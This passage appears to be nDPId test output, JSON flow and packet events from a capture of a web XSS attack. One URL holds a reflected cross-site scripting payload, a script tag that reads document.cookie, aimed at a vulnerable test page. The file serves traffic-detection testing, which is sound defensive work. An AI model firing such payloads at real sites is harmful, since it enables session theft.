+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347417243,"flow_last_seen":1499347417243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347417243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1499347417243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82KJAAD4G7S2sEAABwKgKMt6GAFDK0UZQAAAAAKACchDO3gAAAgQFtAQCCAoBOp7yAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1499347417244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3oZtyr1sytFGUaAScSAwOgAAAgQFtAQCCAoD5HBoATqe8gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1499347417244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347417244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02KNAAD4G7TSsEAABwKgKMt6GAFDK0UZRbcq9bYAQAOXPQAAAAQEICgE6nvMD5HBo"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347418519,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347418519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f6JAAD4GRi6sEAABwKgKMt6UAFCK5d+TAAAAAKACchB0OgAAAgQFtAQCCAoBOqAxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3pQDHUU3iuXflKAScSC3OQAAAgQFtAQCCAoD5HGnATqgMQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1499347418520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347418520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f6NAAD4GRjWsEAABwKgKMt6UAFCK5d+UAx1FOIAQAOVWQQAAAQEICgE6oDED5HGn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347419786,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347419786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QexAAD4Gg+SsEAABwKgKMt6iAFBxNOCCAAAAAKACchCLsQAAAgQFtAQCCAoBOqFuAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3qLCWbCfcTTgg6AScSCizgAAAgQFtAQCCAoD5HLkATqhbgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1499347419787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347419787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Qe1AAD4Gg+usEAABwKgKMt6iAFBxNOCDwlmwoIAQAOVB1gAAAQEICgE6oW4D5HLk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347421069,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347421069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88e9AAD4G0+CsEAABwKgKMt6wAFBX5lNAAAAAAKACchAw8wAAAgQFtAQCCAoBOqKvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3778,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3rDPNYnSV+ZTQaAScSBgwQAAAgQFtAQCCAoD5HQkATqirwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3779,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08fBAAD4G0+esEAABwKgKMt6wAFBX5lNBzzWJ04AQAOX\/yAAAAQEICgE6oq8D5HQk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347422332,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347422332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Nl1AAD4Gj3OsEAABwKgKMt6+AFBNkZW3AAAAAKACchD3hwAAAgQFtAQCCAoBOqPqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3r7LRREdTZGVuKAScSCivwAAAgQFtAQCCAoD5HVgATqj6gEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3788,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1499347422333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347422333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nl5AAD4Gj3qsEAABwKgKMt6+AFBNkZW4y0URHoAQAOVBxgAAAQEICgE6o+sD5HVg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347423604,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347423604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
